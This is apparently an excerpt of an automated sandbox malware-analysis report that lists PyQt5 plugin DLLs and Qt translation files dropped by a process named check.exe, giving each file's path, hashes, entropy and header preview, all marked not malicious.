Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68080
Entropy (8bit):	6.207162014262433
Encrypted:	false
SSDEEP:	1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
MD5:	750A31DE7840B5EED8BA14C1BD84D348
SHA1:	D345D13B0C303B7094D1C438E49F0046791DE7F6
SHA-256:	A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
SHA-512:	5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	41968
Entropy (8bit):	6.0993566622860635
Encrypted:	false
SSDEEP:	768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
MD5:	313F89994F3FEA8F67A48EE13359F4BA
SHA1:	8C7D4509A0CAA1164CC9415F44735B885A2F3270
SHA-256:	42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
SHA-512:	06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:..i..i..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qgif.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39408
Entropy (8bit):	6.0316011626259405
Encrypted:	false
SSDEEP:	768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
MD5:	52FD90E34FE8DED8E197B532BD622EF7
SHA1:	834E280E00BAE48A9E509A7DC909BEA3169BDCE2
SHA-256:	36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
SHA-512:	EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qicns.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45040
Entropy (8bit):	6.016125225197622
Encrypted:	false
SSDEEP:	768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
MD5:	AD84AF4D585643FF94BFA6DE672B3284
SHA1:	5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
SHA-256:	F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
SHA-512:	B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qico.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38384
Entropy (8bit):	5.957072398645384
Encrypted:	false
SSDEEP:	768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
MD5:	A9ABD4329CA364D4F430EDDCB471BE59
SHA1:	C00A629419509929507A05AEBB706562C837E337
SHA-256:	1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
SHA-512:	004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	421360
Entropy (8bit):	5.7491063936821405
Encrypted:	false
SSDEEP:	6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
MD5:	16ABCCEB70BA20E73858E8F1912C05CD
SHA1:	4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
SHA-256:	FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
SHA-512:	3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..\|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qsvg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32240
Entropy (8bit):	5.978149408776758
Encrypted:	false
SSDEEP:	768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
MD5:	C0DE135782FA0235A0EA8E97898EAF2A
SHA1:	FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
SHA-256:	B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
SHA-512:	7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtga.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	5.865766652452823
Encrypted:	false
SSDEEP:	768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
MD5:	A913276FA25D2E6FD999940454C23093
SHA1:	785B7BC7110218EC0E659C0E5ACE9520AA451615
SHA-256:	5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
SHA-512:	CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtiff.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	390128
Entropy (8bit):	5.724665470266677
Encrypted:	false
SSDEEP:	6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
MD5:	9C0ACF12D3D25384868DCD81C787F382
SHA1:	C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
SHA-256:	825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
SHA-512:	45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30192
Entropy (8bit):	5.938644231596902
Encrypted:	false
SSDEEP:	768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
MD5:	68919381E3C64E956D05863339F5C68C
SHA1:	CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
SHA-256:	0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
SHA-512:	6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qwebp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	510448
Entropy (8bit):	6.605517748735854
Encrypted:	false
SSDEEP:	12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
MD5:	308E4565C3C5646F9ABD77885B07358E
SHA1:	71CB8047A9EF0CDB3EE27428726CACD063BB95B7
SHA-256:	6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
SHA-512:	FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qminimal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	844784
Entropy (8bit):	6.625808732261156
Encrypted:	false
SSDEEP:	12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
MD5:	2F6D88F8EC3047DEAF174002228219AB
SHA1:	EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
SHA-256:	05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
SHA-512:	0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754672
Entropy (8bit):	6.6323155845799695
Encrypted:	false
SSDEEP:	12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
MD5:	6407499918557594916C6AB1FFEF1E99
SHA1:	5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
SHA-256:	54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
SHA-512:	8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.\|.JQ..KT..K...K.\|.Js..K.\|.JS..K.\|.JU..K.\|[KU..K.\|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwebgl.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	482288
Entropy (8bit):	6.152380961313931
Encrypted:	false
SSDEEP:	6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
MD5:	1EDCB08C16D30516483A4CBB7D81E062
SHA1:	4760915F1B90194760100304B8469A3B2E97E2BC
SHA-256:	9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
SHA-512:	0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platforms\qwindows.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1477104
Entropy (8bit):	6.575113537540671
Encrypted:	false
SSDEEP:	24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
MD5:	4931FCD0E86C4D4F83128DC74E01EAAD
SHA1:	AC1D0242D36896D4DDA53B95812F11692E87D8DF
SHA-256:	3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
SHA-512:	0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68592
Entropy (8bit):	6.125954940500008
Encrypted:	false
SSDEEP:	1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
MD5:	F66F6E9EDA956F72E3BB113407035E61
SHA1:	97328524DA8E82F5F92878F1C0421B38ECEC1E6C
SHA-256:	E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
SHA-512:	7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144368
Entropy (8bit):	6.294675868932723
Encrypted:	false
SSDEEP:	3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
MD5:	53A85F51054B7D58D8AD7C36975ACB96
SHA1:	893A757CA01472A96FB913D436AA9F8CFB2A297F
SHA-256:	D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
SHA-512:	35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.024232093209084
Encrypted:	false
SSDEEP:	3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
MD5:	8FF05B56C0995F90A80B7064AA6E915C
SHA1:	D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
SHA-256:	A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
SHA-512:	5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6813848812976975
Encrypted:	false
SSDEEP:	3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
MD5:	466EED6C184D2055488D4C5EA9AE5F20
SHA1:	8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
SHA-256:	9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
SHA-512:	D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.631479835393124
Encrypted:	false
SSDEEP:	3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
MD5:	6FBA66FE449866B478A2EBA66A724A02
SHA1:	EBEF6ED8460218CE8DF735659A8CBCD693600AC6
SHA-256:	171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
SHA-512:	2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7483537099309427
Encrypted:	false
